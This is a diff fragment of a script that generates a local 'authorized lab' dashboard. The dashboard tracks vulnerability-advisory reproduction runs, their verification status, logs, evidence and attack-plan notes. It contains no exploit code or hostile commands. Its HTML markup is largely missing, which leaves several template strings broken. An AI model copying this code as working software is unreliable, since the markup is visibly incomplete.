styles_css) + + app_js = """ +const state = { + summary: null, + runs: [], + systems: [], + advisories: {}, + profiles: {}, + selectedRunId: null, + selectedArtifact: null, + filters: { search: "", system: "", status: "", family: "" }, + autoRefresh: true, + refreshMs: 5000, + refreshHandle: null, +}; + +const $ = (id) => document.getElementById(id); +const statusClass = (status) => `status-pill ${({ + "blocked-artifact": "status-blocked-artifact", + "blocked-destructive": "status-blocked-destructive", + "triage-manual": "status-triage-manual", + "verified-real": "status-verified-real", + "verified-synthetic": "status-verified-synthetic", + "suspected": "status-suspected", + "completed": "status-verified-real", + "failed": "status-blocked-artifact", + "skipped": "status-triage-manual" +})[status] || "status-default"}`; + +function escapeHtml(value) { + return String(value ?? "") + .replaceAll("&", "&") + .replaceAll("<", "<") + .replaceAll(">", ">") + .replaceAll('"', """); +} + +function timeAgo(value) { + if (!value) return "-"; + const diff = Date.now() - new Date(value).getTime(); + if (Number.isNaN(diff)) return value; + const seconds = Math.floor(diff / 1000); + if (seconds < 60) return `${seconds}s ago`; + const minutes = Math.floor(seconds / 60); + if (minutes < 60) return `${minutes}m ago`; + const hours = Math.floor(minutes / 60); + if (hours < 24) return `${hours}h ago`; + const days = Math.floor(hours / 24); + return `${days}d ago`; +} + +async function fetchJson(url) { + const response = await fetch(`${url}?t=${Date.now()}`, { cache: "no-store" }); + if (!response.ok) { + throw new Error(`${url} -> ${response.status}`); + } + return response.json(); +} + +async function loadData(preserveSelection = true) { + $("syncState").innerHTML = `Refreshing${new Date().toLocaleTimeString()}`; + const previousRun = state.selectedRunId; + try { + const [summary, runs, systems, advisories, profiles] = await Promise.all([ + fetchJson("./summary.json"), + fetchJson("./runs.json"), + fetchJson("./systems.json"), + fetchJson("./advisories.json"), + fetchJson("./profiles.json"), + ]); + state.summary = summary; + state.runs = runs; + state.systems = systems; + state.advisories = advisories; + state.profiles = profiles; + hydrateFilterOptions(); + + const hashRun = location.hash.startsWith("#run=") ? location.hash.replace("#run=", "") : null; + const selectedCandidate = preserveSelection ? (hashRun || previousRun) : hashRun; + if (selectedCandidate && runs.some((item) => item.run_id === selectedCandidate)) { + state.selectedRunId = selectedCandidate; + } else { + state.selectedRunId = runs[0]?.run_id || null; + } + + renderDashboard(); + $("syncState").innerHTML = `Live${summary.generated_at || new Date().toISOString()}`; + } catch (error) { + $("syncState").innerHTML = `Load Failed${escapeHtml(error.message)}`; + $("runList").innerHTML = ` Dashboard load failed: ${escapeHtml(error.message)}`; + $("detailRoot").innerHTML = `Unable to load dashboard data. Check generated JSON and local static server state.`; + } +} + +function filteredRuns() { + return state.runs.filter((item) => { + if (state.filters.system && item.system_id !== state.filters.system) return false; + if (state.filters.status && item.verification_status !== state.filters.status) return false; + if (state.filters.family && item.repro_profile_id !== state.filters.family) return false; + if (!state.filters.search) return true; + const advisoryTitle = item.advisory_meta?.title || ""; + const haystack = [item.run_id, item.advisory_id, item.system_id, item.repro_profile_id, advisoryTitle] + .join(" ") + .toLowerCase(); + return haystack.includes(state.filters.search); + }); +} + +function renderMetrics() { + const metrics = [ + { label: "Advisories", value: state.summary?.advisory_count ?? 0 }, + { label: "Run Bundles", value: state.summary?.run_count ?? 0 }, + ...Object.entries(state.summary?.statuses || {}).map(([label, value]) => ({ label, value })), + ]; + $("metrics").innerHTML = metrics + .map((item) => `${escapeHtml(item.label)}${escapeHtml(item.value)} `) + .join(""); +} + +function renderSystemCoverage() { + $("systemCoverage").innerHTML = state.systems + .map((system) => { + const total = Math.max(system.total || 0, 1); + const verified = (system.verified_real || 0) + (system.verified_synthetic || 0); + const fill = Math.round((verified / total) * 100); + return ` +++ `; + }) + .join(""); +} + +function renderFailures() { + const failures = state.summary?.recent_failures || []; + $("failureFeed").innerHTML = failures.length + ? failures + .map((item) => ` ++ ${escapeHtml(system.display_name || system.system_id)} + ${escapeHtml(system.browser_present || 0)}/${escapeHtml(system.browser_required || 0)} browser ++${escapeHtml(system.system_id)} · latest ${escapeHtml(system.latest_update || "-")}++ real ${escapeHtml(system.verified_real || 0)} + synthetic ${escapeHtml(system.verified_synthetic || 0)} + blocked ${escapeHtml(system.blocked || 0)} + manual ${escapeHtml(system.manual || 0)} +++++ `) + .join("") + : `+ ${escapeHtml(item.run_id)} + ${escapeHtml(item.status)} ++${escapeHtml(item.title || item.advisory_id)}+${escapeHtml(item.blocked_reason || "-")}+No recent blockers.`; +} + +function renderRunList() { + const filtered = filteredRuns(); + $("runCount").textContent = `${filtered.length} shown`; + $("runList").innerHTML = filtered.length + ? filtered + .map((item) => { + const active = item.run_id === state.selectedRunId ? "is-active" : ""; + const title = item.advisory_meta?.title || item.advisory_id; + const reasoning = item.reasoning_lines?.[0] || item.blocked_reason || ""; + return ` + + `; + }) + .join("") + : `No runs match the current filters.`; + + document.querySelectorAll("[data-run-id]").forEach((button) => { + button.addEventListener("click", () => { + state.selectedRunId = button.dataset.runId; + location.hash = `run=${state.selectedRunId}`; + renderRunList(); + renderDetail(); + }); + }); +} + +function renderDashboard() { + renderMetrics(); + renderSystemCoverage(); + renderFailures(); + renderRunList(); + renderDetail(); +} + +function setFilterListeners() { + [["searchInput", "search"], ["systemFilter", "system"], ["statusFilter", "status"], ["familyFilter", "family"]].forEach(([id, key]) => { + $(id).addEventListener("input", (event) => { + state.filters[key] = String(event.target.value || "").trim().toLowerCase(); + if (key !== "search") { + state.filters[key] = String(event.target.value || ""); + } + renderRunList(); + }); + }); +} + +function hydrateFilterOptions() { + const distinct = (items) => [...new Set(items.filter(Boolean))].sort(); + const patchOptions = (id, values) => { + const control = $(id); + const current = control.value; + control.innerHTML = control.dataset.base; + control.innerHTML += distinct(values).map((value) => ``).join(""); + control.value = current; + }; + patchOptions("systemFilter", state.runs.map((item) => item.system_id)); + patchOptions("statusFilter", state.runs.map((item) => item.verification_status)); + patchOptions("familyFilter", state.runs.map((item) => item.repro_profile_id)); +} + +function defaultArtifact(run) { + const preference = ["requests", "container", "browser", "compose", "reports"]; + for (const key of preference) { + const group = (run.artifact_groups || []).find((item) => item.key === key && item.items?.length); + if (!group) continue; + const preferredText = group.items.find((item) => item.kind === "text"); + return preferredText || group.items[0]; + } + return null; +} + +async function openArtifact(href, label, kind) { + state.selectedArtifact = { href, label, kind }; + document.querySelectorAll(".artifact-button").forEach((button) => { + button.classList.toggle("is-active", button.dataset.href === href); + }); + $("artifactLabel").textContent = label; + $("artifactOpen").href = href; + $("artifactMeta").textContent = href; + try { + if (kind === "image") { + $("artifactViewer").innerHTML = ``; + return; + } + if (href.endsWith(".html")) { + $("artifactViewer").innerHTML = ``; + return; + } + const response = await fetch(`${href}?t=${Date.now()}`, { cache: "no-store" }); + if (!response.ok) throw new Error(`${href} -> ${response.status}`); + const text = await response.text(); + let formatted = text; + if (href.endsWith(".json")) { + try { + formatted = JSON.stringify(JSON.parse(text), null, 2); + } catch (_error) { + } + } + $("artifactViewer").innerHTML = `
${escapeHtml(formatted)}`; + } catch (error) { + $("artifactViewer").innerHTML = `Artifact load failed: ${escapeHtml(error.message)}`; + } +} + +function renderDetail() { + const run = state.runs.find((item) => item.run_id === state.selectedRunId); + if (!run) { + $("detailRoot").innerHTML = `Select a run to inspect full timeline, logs, sources, and reasoning.`; + return; + } + + const advisory = run.advisory_meta || {}; + const profile = run.profile_meta || {}; + const screenshotItems = (run.artifact_groups || []) + .find((group) => group.key === "browser") + ?.items.filter((item) => item.kind === "image") || []; + + $("detailRoot").innerHTML = ` ++ + +Local Verification Workspace++ ${escapeHtml(run.verification_status)} +++ ${escapeHtml(run.system_id)} + ${escapeHtml(run.repro_profile_id)} + ${escapeHtml(run.artifact_mode)} + ${escapeHtml(run.verification_mode)} ++${escapeHtml(advisory.title || run.advisory_id)}
+${escapeHtml(advisory.summary || "No summary available.")}
+ +++Timeline Steps${escapeHtml(run.timeline?.length || 0)} +Artifacts${escapeHtml((run.artifact_groups || []).reduce((sum, group) => sum + group.count, 0))} +Browser${run.browser_evidence?.present ? "Ready" : "Missing"} +Finished${escapeHtml(timeAgo(run.finished_at))} +++ `; + + document.querySelectorAll(".artifact-button").forEach((button) => { + button.addEventListener("click", () => openArtifact(button.dataset.href, button.dataset.label, button.dataset.kind)); + }); + + $("refreshArtifact")?.addEventListener("click", () => { + if (state.selectedArtifact) { + openArtifact(state.selectedArtifact.href, state.selectedArtifact.label, state.selectedArtifact.kind); + } + }); + + if (!state.selectedArtifact || !(run.artifact_groups || []).some((group) => group.items.some((item) => item.href === state.selectedArtifact.href))) { + const artifact = defaultArtifact(run); + if (artifact) { + openArtifact(artifact.href, artifact.label, artifact.kind); + } + } else { + openArtifact(state.selectedArtifact.href, state.selectedArtifact.label, state.selectedArtifact.kind); + } +} + +function attachGlobalActions() { + $("searchInput").addEventListener("input", (event) => { + state.filters.search = String(event.target.value || "").trim().toLowerCase(); + renderRunList(); + }); + [["systemFilter", "system"], ["statusFilter", "status"], ["familyFilter", "family"]].forEach(([id, key]) => { + $(id).addEventListener("input", (event) => { + state.filters[key] = String(event.target.value || ""); + renderRunList(); + }); + }); + $("refreshDashboard").addEventListener("click", () => loadData(false)); + $("autoRefresh").addEventListener("change", (event) => { + state.autoRefresh = Boolean(event.target.checked); + startRefreshLoop(); + }); +} + +function startRefreshLoop() { + if (state.refreshHandle) { + clearInterval(state.refreshHandle); + state.refreshHandle = null; + } + if (!state.autoRefresh) return; + state.refreshHandle = setInterval(() => loadData(true), state.refreshMs); +} + +async function init() { + ["systemFilter", "statusFilter", "familyFilter"].forEach((id) => { + $(id).dataset.base = $(id).innerHTML; + }); + attachGlobalActions(); + await loadData(false); + startRefreshLoop(); + window.addEventListener("hashchange", () => loadData(false)); +} + +document.addEventListener("DOMContentLoaded", init); +""" + write_text(assets_dir / "app.js", app_js) + + html_page = """ + + -++ +++ +Progress Timeline${escapeHtml(run.timeline?.length || 0)} steps
++++ completed ${escapeHtml(run.progress?.completed || 0)} + blocked ${escapeHtml(run.progress?.blocked || 0)} + skipped ${escapeHtml(run.progress?.skipped || 0)} + failed ${escapeHtml(run.progress?.failed || 0)} +++ ${(run.timeline || []).map((item) => ` +++ + `).join("") || `${escapeHtml(item.at || "-")}+${escapeHtml(item.step || "-")}+++${escapeHtml(item.status || "unknown")}+${escapeHtml(item.detail || "-")}+No timeline items available.`} +++ +Attack Plan & Reasoning${escapeHtml(profile.vuln_family || "unknown")}
++ ${run.blocked_reason ? `+Failure reason` : ""} +${escapeHtml(run.blocked_reason)}+ destructive risk ${escapeHtml(profile.destructive_risk || "-")} + cleanup ${escapeHtml(profile.cleanup_policy || "-")} + targets ${(profile.allowed_target_types || []).join(", ") || "-"} +++ ${(run.reasoning_lines || []).map((line) => `+${escapeHtml(line)}`).join("")} ++ ${(profile.success_criteria || []).map((line) => `${escapeHtml(line)}`).join("")} ++++ +Evidence Explorer${escapeHtml((run.artifact_groups || []).length)} groups
++ ${(run.artifact_groups || []).map((group) => ` +++ + `).join("") || `${escapeHtml(group.label)} · ${escapeHtml(group.count)}
++ ${group.items.map((item) => ` + + `).join("")} ++No artifacts linked for this run.`} + ${screenshotItems.length ? ` ++ ${screenshotItems.map((item) => ` + + `).join("")} ++ ` : ""} +++Live Log Viewer${state.selectedArtifact ? "active" : "idle"}
++++ +++Select a report, log, JSON, screenshot, or timeline file to preview it here.++++ +Sources & Fix Topics${escapeHtml((advisory.secondary_source_urls || []).length + (advisory.official_source_url ? 1 : 0))} links
++++ ${(advisory.aliases || []).map((alias) => `${escapeHtml(alias)}`).join("")} +++ ${advisory.official_source_url ? `${escapeHtml(advisory.official_source_url)}` : `+No official source linked.`} + ${(advisory.secondary_source_urls || []).map((ref) => `${escapeHtml(ref)}`).join("")} ++ ${(advisory.secure_code_topics || []).map((topic) => `${escapeHtml(topic)}`).join("")} ++++ +Run JSONraw
++${escapeHtml(JSON.stringify(run, null, 2))}++ +Advisory JSONraw
++${escapeHtml(JSON.stringify(advisory, null, 2))}++Profile JSONraw
++${escapeHtml(JSON.stringify(profile, null, 2))}websafe dashboard - + +websafe authorized lab dashboard + -websafe Local Lab Dashboard
-LAB ONLY | AUTHORIZED TARGETS ONLY | 本地静态看板
- -System Coverage
--
-- - System Total Verified Real Verified Synthetic Blocked Manual Browser Latest Recent Runs
-- - - - ++-+ + +++++Authorized Lab Dashboard+本地攻防实证工作台
+面向授权实验场景的本地静态前端。聚合 advisory、run bundle、日志、浏览器证据、失败原因、利用思路与源头信息,并支持可折叠细节与自动刷新。
++ + + Open Summary JSON ++++++ +Sync State
+BootingLoading generated JSON++ + ++ +Select a run to inspect full details.+-
- + """- - Run System Advisory Status Mode Profile Finished Artifacts